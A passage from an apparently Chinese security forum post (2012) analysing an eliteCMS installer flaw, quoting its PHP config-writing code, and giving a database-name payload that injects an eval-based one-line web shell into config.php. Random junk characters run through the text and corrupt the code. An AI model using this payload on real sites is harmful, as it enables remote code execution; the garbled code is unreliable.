eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装3 t s2 X' h6 c6 [; X
" S/ d& _" @0 H; P另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
* D H1 Q+ Q5 V) \& A我们来看代码:
: h/ U6 T: O! H( H! ]
3 a' J" e9 W! f7 _8 q) u...: r/ K8 `/ J- ]* Z
elseif ($_GET['step'] == "4") {0 B1 \- a4 `" W9 x+ R* s9 [
$file = "../admin/includes/config.php";* B0 E$ z' J4 V' ]6 z3 b
$write = "<?php\n";
) j8 B, R# H+ Y9 I* S) t4 d- {3 s+ s $write .= "/**\n";4 D, p5 {2 P' `/ l9 y
$write .= "*\n";5 ~5 z: Y& Q2 g7 ]! }4 C
$write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";3 f' q8 ~1 d: a7 x# i K! s
...略...
$ P) b( ], E& b; V8 k+ b% s) O $write .= "*\n";9 O6 _1 r' |4 c0 n( e7 ^5 h% s
$write .= "*/\n";7 N! _5 o( @' k. j# Q5 { A: {
$write .= "\n";
2 ^, H8 f; V8 V $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
1 M* O0 q3 c5 H5 w; G; }. u. }5 { $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";- U& s8 E; H- y; T8 F' D3 w9 e
$write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
: U7 p. o) e' \ b $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
) A: N5 F, e8 @2 ?% H' L& _ $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
' ?8 K" ?$ b* d9 A. l1 h; z $write .= "if (!\$connection) {\n";- v/ G( w1 k0 m2 D4 L" G3 k
$write .= " die(\"Database connection failed\" .mysql_error());\n";3 Q6 G3 y/ z: L1 \/ f N
$write .= " \n";
4 l% e2 Z# y. z! y1 d $write .= "} \n";1 \: y0 y! |$ W d' A7 T+ I
$write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";/ ^* n. @7 S* J* @# o( _6 j
$write .= "if (!\$db_select) {\n";8 R7 j, i( l V( n
$write .= " die(\"Database select failed\" .mysql_error());\n";
! |& P6 c+ K. w7 W( \ B $write .= " \n";9 S$ L1 g4 c3 u' i7 S3 J
$write .= "} \n";) G2 N2 q2 P7 f& G+ w& X
$write .= "?>\n";. a$ V) N- V# s+ P
' O0 N' K+ [8 i/ ~! C4 K* u8 h, x $writer = fopen($file, 'w');
2 C" y* ?+ ~2 P" K" P; ~# b...
7 q+ f7 M9 V, w) A& J 0 r# E9 O) s. p
在看代码:2 a2 |7 ]- b$ z0 j$ a
! z U' k5 v8 q1 r) F& Y8 D$ {$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
4 f1 I+ f: q6 w5 }& N8 y* T$_SESSION['DB_NAME'] = $_POST['DB_NAME'];" Y$ B7 Y2 Y; T! |- O5 |$ e& w" T: V
$_SESSION['DB_USER'] = $_POST['DB_USER'];+ @, H( @4 O3 |: ~1 T5 J
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];& G1 M" {1 D/ e1 {
0 e9 m9 O& W" g$ \
取值未作任何验证( B- Y% b$ y4 s+ h
如果将数据库名POST数据:
2 P0 i0 q/ Y0 l6 P/ s 5 t! l/ D7 a8 Q& b" r% f d
"?><?php eval($_POST[c]);?><?php1 _0 F! u. X2 K0 c
& q6 O& ~* ?/ z& z* T' d- ~- V# d将导致一句话后门写入/admin/includes/config.php( t0 |/ H* X; n6 j7 _1 `. C0 Z
|
发表于 2012-11-18 13:59:27
收藏
支持
反对